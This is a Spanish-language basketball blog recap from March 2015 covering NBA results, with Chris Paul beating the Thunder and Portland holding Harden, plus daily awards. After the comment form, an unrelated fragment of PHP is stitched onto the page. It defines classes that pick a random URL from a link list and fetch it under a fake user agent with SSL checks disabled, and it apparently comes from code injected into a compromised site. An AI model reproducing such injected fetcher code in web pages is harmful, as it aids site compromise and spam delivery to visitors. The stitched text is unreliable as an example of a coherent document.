La Crónica: Algo que decir

12 de March de 2015 por MagicJohnson32

Westbrook, Westbrook, Westbrook… Últimamente, tras cada partido de los Thunder, sólo hablamos de Russell Westbrook. Hoy, no. Hoy es Chris Paul el protagonista de esta crónica y quien merece todos nuestros elogios. Y no sólo por su extraordinaria actuación de anoche, sino por hacer de estos Clippers sin Griffin un equipo más que competitivo. Pero guardemos algunos halagos para los Blazers, capaces de anular a Harden y llevarse un triunfo fundamental. Khris Middleton, Aaron Brooks o TJ Warren también se hacen un sitio destacado en la crónica de la jornada que os contamos a continuación.

L.A. Clippers 120 – OKC Thunder 108

En las últimas semanas, Russell Westbrook había dominado cada partido disputado, protagonizado cada crónica, y con todo mérito se había situado entre los candidatos al MVP de la temporada. Anoche, Chris Paul decidió que tenía algo que decir al respecto, y vaya si lo hizo. En ausencia de los F estelares de ambos equipos (a Griffin se le espera de vuelta este fin de semana, a Durant en unos 10 días), no cabía duda de que el encuentro se decidiría en el duelo de bases, y el de los Clippers se encargó de que no estuviese igualado. Desde el salto inicial, CP3 desarboló a Westbrook en ambos lados de la cancha, y aunque el de los Thunder acabó con números espectaculares (24 puntos, 9 rebotes, 7 asistencias) no se acercaron a sus recientes exhibiciones y fueron a costa de un porcentaje muy pobre (5 de 14 en tiros de campo) y 10 pérdidas de balón. Los Clippers contaron en cambio con un Paul extremadamente efectivo y se dieron un festín desde más allá de la línea de 3 (14 de 21 entre Barnes, Paul y Redick). Sólo el acierto de Morrow, autor de 5 triples en la primera mitad, mantuvo a los Thunder en el partido antes de que Paul diese el mazazo definitivo y la ventaja creciese hasta los 22 puntos. OKC cae a la novena posición del Oeste con esta derrota, medio partido por detrás de los Pelicans.

Houston Rockets 100 – Portland Trail Blazers 105

Lo único que tenían que hacer los Blazers para vencer a los Rockets era defender bien a Harden. ¿Fácil? No ¿Imposible? Por lo visto anoche, tampoco. Tras encajar 44 y 45 puntos de la Barba en los dos últimos enfrentamientos, los Blazers parecieron encontrar la receta para frenar a Harden en la segunda mitad del trascendental partido disputado anoche. El escolta anotó 14 puntos en la primera mitad pero tras el intermedio Stotts hizo varios ajustes y asignó a Nicolas Batum la responsabilidad de defender al candidato a MVP. Harden no anotó más que cuatro puntos en toda la segunda mitad (ninguno en el último cuarto) y los Blazers se lanzaron a por una victoria que les devuelve a la tercera posición del Oeste y además les da ventaja en caso de empate con los Rockets. Pese a todo, no se rindieron los Rockets, que se quedaron a un paso de la machada con Corey Brewer en plan heróico: anotó 17 puntos en el último periodo y casi por sí solo redujo a la mínima una diferencia que había llegado a ser de once puntos. Brewer incluso dispuso de un triple que habría empatado el partido a falta de 7 segundos. El lanzamiento no entró y los Blazers pudieron celebrar su primer triunfo sin Wes Matthews.

Resto de la jornada

La madrugada ofreció muchas sorpresas y finales igualados. Por ejemplo, los Bulls necesitaron una prórroga para despachar a los Sixers (104-95) en una gran actuación de Pau Gasol y un inopinado duelo de bases entre Aaron Brooks e  Ish Smith. Donde sí se consumaró la sorprendente victoria local fue en Denver, donde los Hawks cedieron (102-115) ante unos Nuggets irreconocibles desde la marcha de Shaw. También hubo sorpresa en Boston, escenario de la primera derrota (92-95) que encajan los Grizzlies esta temporada ante un equipo del Este con balance por debajo del 50%. Los Celtics siguen enganchados a la lucha por los Playoffs, lucha en la que anoche salieron como triunfadores los Heat gracias a su victoria sobre los Nets (98-104) y la derrota de los Hornets contra los Kings (113-106). Regresó Kemba, por cierto, pero Al Jefferson se marchó lesionado. Con los que ya no contamos como aspirantes a Playoffs son los Pistons, derrotados por octavo partido consecutivo aunque anoche al menos dieron la cara en Oakland (98-105). Sí estarán en la postemporada los Bucks, a los que Khris Middleton condujo a una ajustada victoria sobre los Magic (91-97). Y vivos siguen los Suns, a 2,5 partidos de la 8ª plaza tras ganar a los Wolves (97-106) con un TJ Warren especialmente acertado.

PREMIOS

MVP:  Los Clippers bailan al ritmo que toca Chris Paul y ayer el base vivió uno de esos momentos mágicos de inspiración. Nada menos que 33 puntos, 9 asistencias, 4 rebotes y 2 robos en casa de Russell Westbrook y los Thunder.

Rookie: Empieza a enseñar la patita TJ Warren, protegido del blog junto a TJ Ford y cualquier jugador llamado TJ. El alero rookie de los Suns disfrutó de 19 minutos en los que anotó 17 puntos con un 8 de 10 en TC.

Sorpresa: Khris Middleton quedo ensombrecido tras los nombres de algunos de sus compañeros pero se merece también una buena dosis de reconocimiento. Ayer le entró prácticamente todo lo que intentó y acabó el partido con 30 puntos. Por su parte, Aaron Brooks fue el mejor de los suyos en Philadelphia con 31 puntos y no nos olvidamos de Chris Andersen, que en ausencia de Hassan Whiteside brilló con 18 puntos, un 8 de 9 en TC y 14 rebotes.

Decepción: No funcionaron las cosas para Atlanta en general y Al Horford en particular. El dominicano se quedó en sólo 6 puntos y 3 rebotes.

Esfuerzo en vano: Cuarto partido de 20-20 para Andre Drummond, el que más ha conseguido en los últimos dos años. Sin embargo sus 22 puntos, 27 rebotes (17 ofensivos) y 2 tapones no pudieron evitar la 8ª derrota de los Pistons.

TOP-10

Imágenes | AP Photos / Getty Images

Esta entrada no tiene comentarios... pero tú puedes ser el primero.

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>